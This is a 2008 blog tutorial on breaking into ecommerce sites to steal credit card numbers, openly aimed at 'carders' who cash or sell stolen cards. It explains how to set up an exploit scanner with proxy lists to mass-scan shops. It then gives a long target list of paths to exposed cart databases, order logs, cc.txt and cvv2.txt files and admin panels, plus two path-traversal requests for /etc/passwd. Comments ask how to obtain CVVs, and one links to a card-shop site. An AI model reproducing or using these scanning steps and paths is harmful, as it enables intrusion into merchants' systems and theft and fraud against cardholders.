Friday, November 21, 2008

How To Hack Shop-Admin And Get Credit Card Numbers

As covered on the main site all information presented within this guide is for
information purposes only. any attempt to use the information within this guide
to commit anything illegal is solely the responsibility of the reader, and
neither i, information leak, nor anyone else affiliated is responsible for
what you do with the following information.


Section 1: the introduction
----------------------------

Originally i was working on a security scanner for ecommerce sites, but since i'm
about to get back into school and won't have as much time as before to really
work on many projects i decided it'd be better to just go ahead and write a
tutorial on the subject. so for this tutorial we will talk about one way a carder
would collect ccs to cash/use/sell/whatever, and that of course is exploiting
ecommerce sites. there are millions of sites out there used by businesses large
and small for peddling their services/merchandise, and needless to say there are
plenty of them out there that are easily exploited. so here it is, the answer to
every "how to hack cc" question out there. enjoy...


Section 2: database vulnerabilities
------------------------------------

One of the most common and easiest ways to exploit ecommerce sites is to use
database vulnerabilities. these are present due to insecure database software
that many ecommerce sites will use for recording and tracking online purchases.
one method that an attacker could use to find such database vulnerabilities on
a specific site is to use an exploiter. exploiters are software that will use
an exploit list to scan for exploits on a target web server, and report back
any positive responses. cmxploiter iv (content is disable for unregistered
register here)
is an example of an exploiter, though there are others that you can look for to
use as well. the interface for cmxploiter iv is pretty self-explanatory, but i'll
run you through the basics anyway. to use this tool you would first click "load",
which will bring up three different tabs. you would click "exploit lists" to
select an exploit list to use, "proxy list" is to of course select a list of
proxies to use, and "url list" is to select a list of targets to scan. then from
there you would go to options. the first menu to pop up is the current session
options. edit the responses to include in session history so that only the
"200 series responses" (positive responses) are included in the results, and from
here you can also edit the "socket timeout value" based on your internet connection
(leave as is for faster internet connections, set to 40 for slower internet
connections). then go to proxy list selection options and either put in the proxy
you are going to use for the scan, or click "multi-proxy mode" to tell cmxploiter iv
to use the proxy list you loaded. now that you have everything configured go
to start and select the type of scan you want to do. "single url scan" is used to
scan a single server with the exploit list provided, "multi-url scan" is used to
scan every site in the url list for every exploit in the exploit list, and
"single exploit scan" is used to scan every site in the url list for a single
exploit. on a last note with any exploiter you use if the option is available
be sute to set it to use get requests instead of head requests for the scan.
i've found that you get much more accurate results that way. now that i've
covered all the configurations i'm going to provide an exploit list that you
could use for scanning database vulnerabilities...


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$

/+comersus/database/comersus.mdb
/+comersus/store/comersus.mdb
/../../cart32.mdb
//comersus.mdb
//comersus/comersus.mdb
//comersus/database/comersus.mdb
//database/comersus.mdb
//shop/
//shop/?m=a
//store/
//store/?m=a
//store/comersus.mdb
//store/comersus/comersus.mdb
//store/comersus/database/comersus.mdb
//store/database/comersus.mdb
/asp/cart/
/asp/cart/database/
/asp/cart/database/metacart.mdb
/bin/cart.pl
/bin/cartmanager.cgi
/cgi-bin/cart.pl
/cgi-bin/cartmanager.cgi
/cgi/cartmanager.cgi
/cybercash/smps*.../merchants/admin.pw
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/dcshop_admin.cgi
/dcshop/orders/orders.txt
/midicart/midicart.mdb
/merchant2/
/merchant2/install.txt
/merchant2/admin.mv
/merchant2/database/
/merchant2/modules/
/orders
/orders/
/orders/
/orders/order.log
/orders/order_log.dat
/orders/order_log_v12.dat
/orders/orders.txt
/oscommerce/catalog/
/oscommerce/catalog/admin/
/oscommerce/catalog/admin/orders.php
/osecommerce/
/osecommerce/admin/
/osecommerce/admin/admin/
/osecommerce/admin/admin/includes/
/osecommerce/admin/admin/includes/functions/
/osecommerce/admin/admin/includes/functions/databa se.php
/pdg/cvv2.txt
/pdg/order.txt
/pdg_cart
/pdg_cart/
/pdg_cart/authorizenet.txt
/pdg_cart/authorizenets.txt
/pdg_cart/cc.txt
/pdg_cart/oder.log
/pdg_cart/order.log
/pdg_cart/shopper.conf
/pdg_cart/shopper.config
/ptsc/db/ptsc.mdb
/procuctcart/pc/pcadmin/
/prodctcart/pcadmin/
/productcart/database/eipc.mdb
/productcart/pc/admin
/sales_files/
/shop/shop.sql
/shop/info.dat
/shop/orders.in
/shop/track.db
/shopcart2.mdb
/shoppingcart/cart.jsp
/shoppingcart/orders.inc
/siteserver/admin/
/siteserver/admin/commerce/foundation/dsn.asp
/siteserver/admin/commerce/foundation/domain.asp
/siteserver/admin/commerce/foundation/driver.asp
/siteserver/admin/knowledge/dsmgr/default.asp
/siteserver/admin/knowledge/dsmgr/users/groupmanag er.asp
/siteserver/admin/knowledge/dsmgr/users/usermanage r.asp
/siteserver/admin/knowledge/persmbr/vslslprd.asp
/siteserver/admin/knowledge/persmbr/vsprauoed.asp
/siteserver/admin/knowledge/persmbr/vstmpr.asp
/siteserver/admin/knowledge/persmbr/vs.asp
/siteserver/knowledge/default.asp?ctr=\">
/siteserver/publishing/
/siteserver/publishing/viewcode.asp
/siteserver/publishing/viewcode.asp
/siteserver/admin/
/siteserver/admin/findvserver.asp
/siteserver/admin/findvserver.asp?uid=ldap_anonymo us&pwd=ldappassword_1
/store/admin/default.asp
/store/orders.inc
/storeadmin
/storeadmin/
/storedb
/storedb/
/webshop
/webshop/
/webshop/logs/
/webshop/logs/cc.txt
/webshop/logs/ck.log
/webshop/templates/cc.txt
/web_store
/web_store/web_store.cgi?page=../../../../../../../ ../../../etc/passwd.html
/web_store
/web_store/
/web_store/admin_files/
/web_store/web_store.cgi?page=../../../../../../../ ../etc/passw
/webshop*
/webshop/
/webshop/*
/webstore/
/_database/shopping400.mdb
/_private/shopping_cart.mdb
/_vti_cnf/order.log
/_vti_cnf/order.txt
/acart.mdb
/acart2.mdb
/acart20.mdb
/acart2_0.mdb
/acart2_0/acart2_0.mdb
/acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=
/acart2_0/admin/index.asp?msg=
/acart2_0/deliver.asp?msg=

3 comments:

kings said...

bro after exploiting what will you do next.....can you please be a little clear

kings said...

after exploiting what else you do to get the cvv

Bruce Mack said...

CC Shop Admin http://bit.ly/UR4G6U